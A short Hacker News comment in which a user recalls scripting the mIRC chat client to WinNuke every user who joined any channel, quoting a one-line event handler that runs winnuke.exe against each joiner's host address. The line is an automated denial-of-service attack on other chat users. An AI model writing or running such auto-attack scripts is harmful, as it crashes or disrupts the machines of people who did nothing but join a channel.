Y
Hacker News
new
|
ask
|
show
|
jobs
by
pkrumins
4082 days ago
I scripted mIRC to WinNuke everyone on join in all channels. Something like this:
ON *:join:#: { /run c:\winnuke.exe $gettok($address,2,64) }